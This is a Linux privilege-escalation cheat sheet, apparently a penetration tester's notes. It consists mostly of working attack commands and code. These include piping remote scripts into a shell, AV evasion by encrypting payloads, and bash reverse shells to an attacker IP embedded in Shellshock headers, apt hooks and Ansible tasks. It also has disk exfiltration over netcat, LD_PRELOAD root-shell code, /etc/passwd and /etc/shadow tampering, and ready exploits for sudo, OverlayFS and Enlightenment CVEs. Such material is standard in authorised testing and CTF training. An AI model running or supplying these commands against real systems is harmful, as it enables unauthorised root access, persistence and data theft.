PrivilageEsc Linux 👑
Linux Privilege Escalation Scripts
Remote Network
## ------------------| Remote download and execrute from Github
curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh
wget -q -O - https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh
Local Network
## ------------------| Local Network
curl 10.10.10.10/linpeas.sh | sh
## ------------------| Without CURL
sudo nc -q 5 -lvnp 80 < linpeas.sh #Host
cat < /dev/tcp/10.10.10.10/80 | sh #Victim
## ------------------| Excute from memory and send output back to the host
curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Victim
wget -q -O - 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Victim
nc -lvnp 9002 | tee linpeas.out #Host
Output Format
## ------------------| Output to file
./linpeas.sh -a > /dev/shm/linpeas.txt #Victim
less -r /dev/shm/linpeas.txt #Read with colors
AV Bypass
## ------------------| open-ssl encryption
openssl enc -aes-256-cbc -pbkdf2 -salt -pass pass:AVBypassWithAES -in linpeas.sh -out lp.enc
sudo python -m SimpleHTTPServer 80 #Start HTTP server
curl 10.10.10.10/lp.enc | openssl enc -aes-256-cbc -pbkdf2 -d -pass pass:AVBypassWithAES | sh #Download from the victim
## ------------------| Base64 encoded
base64 -w0 linpeas.sh > lp.enc
sudo python -m SimpleHTTPServer 80 #Start HTTP server
curl 10.10.10.10/lp.enc | base64 -d | sh #Download from the victim
Remote Network
## ------------------| Remote download and execrute from Github
curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | sh
Local Network
./LinEnum.sh -r report.out -t
# -t <-- Include thorough (lengthy) tests
# -e /dev/shm/ <-- Export all info by separate one by one
./linux-exploit-suggester-2.pl -k <KernalVersion>
./lse.sh -l 2 -i
-Linux process snooping [unprivileged]
## ------------------| print both commands and file system events and scan procfs every 1000 ms (=1sec)
./pspy64 -pf -i 1000
## ------------------| place watchers recursively in two directories and non-recursively into a third
./pspy64 -r /path/to/first/recursive/dir -r /path/to/second/recursive/dir -d /path/to/the/non-recursive/dir
## ------------------| disable printing discovered commands but enable file system events
./pspy64 -p=false -f
06. Common exploits
06.0 Abusing Shell Features
## ------------------| If bash < 4.2-048 we can inject to absolute path aswell.
/bin/sh --version
strace -v -f -e execve /path/to/file 2>&1 | grep exec
function /path/to/service { /bin/bash -p; }
export -f /path/to/service
/path/to/file
## ------------------| If bash < 4.4 (Bash debug ps4)
/bin/sh --version
env -i SHELLOPTS=xtrace PS4='$(whoami)' /path/to/file
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/vulnbash; chmod +s /tmp/vulnbash)' /path/to/file
/tmp/vulnbash -p
06.1 Shellshock
Date patched : 24 September 2014
Date discovered : 12 September 2014
Affected software : Bash (1.0.3–4.3)
h4rithd='() { :; }; echo sh0ck' bash -c :
h4rithd='() { :;}; echo sh0ck' bash -c :
# If print sh0ck; does look like vulnerable to shell shok
# to verify
h4rithd='echo sh0ck' bash -c :
# Nothing print
# Pik any env variable
env
LOGNAME='() { :;}; echo sh0ck' sudo /root/troll
## ------------------| With user agent
curl -A '() { :; }; echo;echo; /bin/bash -i >& /dev/tcp/10.10.14.26/4545 0>&1' http://127.0.0.1/cgi-bin/stats
### or
curl -so shellshock.py https://www.exploit-db.com/raw/34900
python shellshock.py payload=reverse rhost=10.10.14.26 lhost=127.0.0.1 lport=4545 pages=/cgi-bin/stats
06.2 LXD
## ------------------| Find local user account is part of lxd groups.
id
## ------------------| clone the repository and build the build-alpine img
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
sudo ./build-alpine
## ------------------| For 32 bit use -a i386 or -a i686
mv alpine-v* alpine.tar.gz
ls -al
## ------------------| Start web server
python3 -m http.server 80
## ------------------| Download the file on attacker machine.
cd /dev/shm
wget 10.10.14.26/alpine.tar.gz
## ------------------| Execute and gain root shell
lxc image import ./alpine.tar.gz --alias h4rithd
lxc image list
lxc init h4rithd ignite -c security.privileged=true
### if above command get error, try lxd init
lxc list
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id
cd /mnt/root
wget https://raw.githubusercontent.com/whotwagner/logrotten/master/logrotten.c
gcc -o logrotten logrotten.c
echo "bash -i >& /dev/tcp/10.10.14.26/4545 0>&1" > shell.sh
chmod +x shell.sh
echo "test">>/<path>/access.log; ./logrotten <path>/access.log -d
cp $(pwd)/shell.sh /etc/bash_completion.d/access.log
cat /etc/bash_completion.d/access.log
## ------------------| Abstract
## Vulnerability in the Linux kernel since 5.8 which allows overwriting data in arbitrary read-only files
## The vulnerability was fixed in Linux 5.16.11, 5.15.25 and 5.10.102.
## ------------------| Add root user
wget https://raw.githubusercontent.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit/main/exploit.c
gcc -o dpipe exploit.c
./dpipe
su aaron # password : aaron
## ------------------| Change SUID binary
wget https://raw.githubusercontent.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits/main/exploit-2.c
gcc -o dpipe exploit-2.c
./dpipe $(which dash)
06.5 If you have or can?
If you have
LD_PRELOAD
inenv_keep
variable?
## ------------------| Check if env_keep variable has LD_PRELOAD?
sudo -l
## ------------------| Create C code compiled as a share object (.so extension) file
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setresuid(0,0,0);
system("/bin/bash -p");
}
## ------------------| Complie the c code to share object (.so extension)
gcc -fPIC -shared -o /tmp/shell.so shell.c -nostartfiles
## ------------------| Execute
sudo LD_PRELOAD=/tmp/shell.so <Programe_Listed_in_sudo-l>
If you have
LD_LIBRARY_PATH
inenv_keep
variable?
## ------------------| Check if env_keep variable has LD_PRELOAD?
sudo -l
## ------------------| Create C code compiled as a share object
#include <stdio.h>
#include <stdlib.h>
static void hijack() __attribute__((constructor));
void hijack() {
unsetenv("LD_LIBRARY_PATH");
setresuid(0,0,0);
system("/bin/bash -p");
}
## ------------------| Complie the c code to share object (.so extension)
gcc -o /tmp/library_path.so -shared -fPIC library_path.c
## ------------------| Hijacking shared objects libcrypt.so.1
## Run ldd against the (sudo -l) programs file to get another
mv /tmp/library_path.so /tmp/libcrypt.so.1
## ------------------| Execute
sudo LD_LIBRARY_PATH=/tmp/ <Programe_Listed_in_sudo-l>
If you have
SETENV
insudo -l
?
## ------------------|Check
sudo -l | grep SETENV
## ------------------| Execute
sudo PATH=/<PATH>/:$PATH /script.sh
Do we have
no_root_squash
in/etc/exports
### If the “no_root_squash” option is present on a writable share, we can create an executable with SUID bit set and run it on the target system
## ------------------| Check if no_root_squash is present?
cat /etc/exports | grep no_root_squash
## ------------------| List mounts and mount it to our local machine
showmount -e <IP>
sudo mkdir -p /mnt/new
sudo mount -t nfs <IP>:/<WritableShares>/mnt/new
### Create a SUID binary and place it. then execuite it via attackers machine.
If you have write permission to
/etc/sudoers
file?
### Get current user using whoami command, then enter the following line
username ALL=(ALL) NOPASSWD: ALL
### Then run sudo su -
If you have write permission to
/etc/shadow
file?
## ------------------| Create password
openssl passwd -6 -salt h4rithd h4rithd123
### -1 --> MD5
### -5 --> SHA256
### -6 --> SHA512
### also you can use it with out salt flag
### Replace the password in /etc/shadow (h4rithd123)
$6$h4rithd$SjZ3XkShHfK9x1Rpn9RhhDH030H4cy.igvwhXGoAb93wEUM9AGR5fjR6ms/oqCqhkopN9Wj/ORX/SlUoaypYI0
sed -i -E 's/^([^:]+:)([^:]+)(..+)$/\1PASSWORD\3/g' /etc/shadow
## ------------------| one line : h4rithd123
sed -i -E 's/^([^:]+:)([^:]+)(..+)$/\1$6$\/dij\/aLbpn4NJrUW$iNXC\/blQ8FP6.kgZmpazax0RNiKBRRVwTuH5e2UFaYUQo8XOKb9aQU8hM7.e2I3omzD4Mp4XRHHzk0B2txbBW\/\3/g' /etc/shadow
If you have write permission to
/etc/passwd
?
## ------------------| Create password
openssl passwd -1 -salt h4rithd Password123 # ->> $1$h4rithd$wXIyqYpzYefGzryBsTFSU/
## ------------------| Edit the passwd file
echo 'h4rithd:$1$h4rithd$wXIyqYpzYefGzryBsTFSU/:0:0:root:/root:/bin/bash' >> /etc/passwd
## ------------------| Login to the user h4rithd
su h4rithd ## Password123
Can run
apache2
as root user?
## ------------------| Read the shadow file
sudo apache2 -f /etc/shadow
## then crack it
If you are in **
video
** group
## The video group has access to view the screen output.
## Use w command and find is there any tty1 session (physically logged)
cat /dev/fb0 > /tmp/screen.raw ## Copy that file to host machine.
cat /sys/class/graphics/fb0/virtual_size ## Use this as resolution.
## Open photo using gimp as "RAW image data" and set color mode as RGB565
If you are in
docker
group
## ------------------| List docker images
docker images | awk '{print $1}' | sed '1d'
## ------------------| Use one of image and get root
docker run -v /:/mnt --rm -it <img_name> chroot /mnt sh
If you have
apt update
on/etc/crontab
## ------------------| Create pre-invoke script
echo '/bin/bash -c "/bin/bash -i >& /dev/tcp/<HOSTIP>/4545 0>&1"' | base64 -w0
echo 'APT::Update::Pre-Invoke {"echo L2Jpbi9 | base64 -d | bash"}' > /etc/apt/apt.conf.d/000shell
If
sudo -l
only forapt-get update
orapt-get upgrade
?
## Watch this video
https://youtube.com/watch?v=EXuEDHFjS9E&t=2070
If you see
jdwp
run as privilege user ??
## ------------------| First you need to port forword
ssh -L 8000:127.0.0.1:8000 user@ip
## ------------------| Using jdwp-shellifier [Best Methord]
git clone https://github.com/IOActive/jdwp-shellifier
cd jdwp-shellifier
### Create reverse shell on /tmp/shell.sh (Victem's machine)
python2 jdwp-shellifier.py -t 127.0.0.1 --break-on "java.lang.String.indexOf" --cmd "/tmp/shell.sh"
## ------------------| Attached remote port [Connection is not persistence]
jdb -attach 8000
> classpath ### List class path
> classes ### List classes
> threads ### List all threads
> stop in java.lang.String.indexOf(int) ### Set brakepoint
print new java.lang.Runtime().exec("/bin/touch /tmp/hello.txt")
If you are in
disk
group ?
## ------------------| Check if you are in disk group.
groups | grep -oP disk
## ------------------| Check if you have R/W permission on sds.
ls -la /dev/sd*
## ------------------| Check which one belongs to me.
mount | grep '^\/dev'
## ------------------| Try to read it
strings /dev/sda1 | grep root.txt
debugfs /dev/sda1 ## then use ls commands.
## ------------------| If you do not have access; Check if it link to any other
ls -al /dev/mapper/Kotarak--vg-root ##Suppose I get an "/dev/dm-0" in response.
## ------------------| Send file using netcat
nc -lvnp 8002 > disk.img.gz ## on attacker's machine
dd if=/dev/dm-0 | gzip -1 - | nc <attackers'IP> 8002
## ------------------| Mout the image file to our machine
gunzip disk.img.gz
mount disk.img /mnt
## ------------------| Check which file we have write permission on
find /etc -writable -ls 2>/dev/null
ls -al /etc/fail2ban/action.d/
## ------------------| Expolit
### Replace "actionban = shell" on /etc/fail2ban/action.d/iptables-multiport.conf
sed 's/actionban =.*/actionban = chmod u+s \/bin\/bash/g' /etc/fail2ban/action.d/iptables-multiport.conf > config.conf
rm -f /etc/fail2ban/action.d/iptables-multiport.conf
mv config.conf /etc/fail2ban/action.d/iptables-multiport.conf
sudo /etc/init.d/fail2ban restart
hydra <IP> ssh -l root -P /usr/share/wordlists/rockyou.txt
ls -l /bin/bash
bash -p
Can you run gdb (debug)?
## ------------------| Find process which run under root prv
ps -aux | grep root | grep "python"
## ------------------| Attach the gdb instance to that specific process ID
gdb -p
## ------------------| Hook/Call the process
call (void)system("chmod u+s /bin/bash")
quite
bash -p
If you can read
.Xauthority
file?
## ------------------| Check if it contain MIT-magic-cookie-1
xxd .Xauthority
## ------------------| Check what display is currently connected (:0)
w
## ------------------| Verify Cookie
XAUTHORITY=/tmp/.Xauthority xdpyinfo -display :0
XAUTHORITY=/tmp/.Xauthority xwininfo -root -tree -display :0
## ------------------| Take Screenshot
XAUTHORITY=/tmp/.Xauthority xwd -root -screen -silent -display :0 > /tmp/capture.xwd
## ------------------| Convert
sudo apt install imagemagick -y
convert capture.xwd capture.png
If you can run
dstat
tool as sudo
## ------------------| Find configuration settings
find / -type d -name dstat 2>/dev/null
## ------------------| Assume the location is "/usr/local/share/dstat"
echo "import os;os.system('sudo chmod +s /usr/bin/bash')" > /usr/local/share/dstat/dstat_h4rithd.py
dstat --list | grep h4rithd
sudo -u root /usr/bin/dstat --h4rithd
bash -p
If we can run any
doas
## ------------------| Find configuration settings
find / -type f -name doas.conf 2>/dev/null
## ------------------| run as another user
doas -u root /usr/bin/bash
06.6 SUDO Vulnerability
## ------------------| Affected sudo versions: 1.8.0 to 1.9.12p1
sudo -V
## ------------------| Exploit
export EDITOR="vim -- /etc/passwd"
sudoedit /etc/motd
### change any user group to 0
06.7 Ansible
## ------------------| Reverse Shell
- hosts: localhost
tasks:
- name: rev
shell: bash -c 'bash -i >& /dev/tcp/<IP>/4545 0>&1'
## ------------------|
06.8 Other
##_______________________________________________________________________________
## Sudo 1.8.27 - Security Bypass (CVE: 2019-14287)
sudo -u#-1 /bin/bash
##_______________________________________________________________________________
## CVE-2021-3156 sudo Vulnerability Allows Root Privileges
## https://blog.aquasec.com/cve-2021-3156-sudo-vulnerability-allows-root-privileges
## versions 1.7.7 through 1.7.10p9, 1.8.2 through 1.8.31p2, and 1.9.0 through 1.9.5p1 are affected.
sudoedit -s '\' `perl -e 'print "A" x 65536'`
## If you receive a usage or error message, sudo is not vulnerable. If the result is a Segmentation fault, sudo is vulnerable
##_______________________________________________________________________________
## USBCreator D-Bus Privilege Escalation in Ubuntu Desktop
gdbus call -y -d com.ubuntu.USBCreator -o /com/ubuntu/USBCreator -m com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /dev/shm/rootkey true
06.9 OverlayFS 2021 - [CVE-2021-3493]
## ------------------| Affected Versions,
Ubuntu 20.10
Ubuntu 20.04 LTS
Ubuntu 19.04
Ubuntu 18.04 LTS
Ubuntu 16.04 LTS
Ubuntu 14.04 ESM
## ------------------| Expolit
ssh
## Or you can download it from here: https://github.com/h4rithd/PrecompiledBinaries/tree/main/CVE-2021-3493
gcc exploit.c -o exploit
./exploit
06.10 OverlayFS 2023 - [CVE-2023-0386]
## ------------------| Affected Versions, if kernel version is lower than 6.2
uname -r
## ------------------| Expolits
git clone https://github.com/xkaneiki/CVE-2023-0386.git
## or you can download precompiled binary from here: https://github.com/h4rithd/PrecompiledBinaries/edit/main/CVE-2023-0386
sudo apt-get install libfuse-dev libcap-dev
cd CVE-2023-0386
make all
### Start two terminals and enter in the first terminal
./fuse ./ovlcap/lower ./gc
### In the second terminal enter
./exp
06.11 GameOver(lay) [CVE-2023-2640 & CVE-2023-32629]
## ------------------| My one
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; u/python3 -c 'import os;os.setuid(0);os.system(\"/bin/bash -i\")'"
## ------------------| Original poc payload
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")'
## ------------------| Adjusted poc payload by twitter user; likely false positive
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; u/python3 -c 'import os;os.setuid(0);os.system(\"id\")'"
06.12 Enlightenment (CVE-2022-37706)
## ------------------| Expo
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
07. Kernel Privesc
Last updated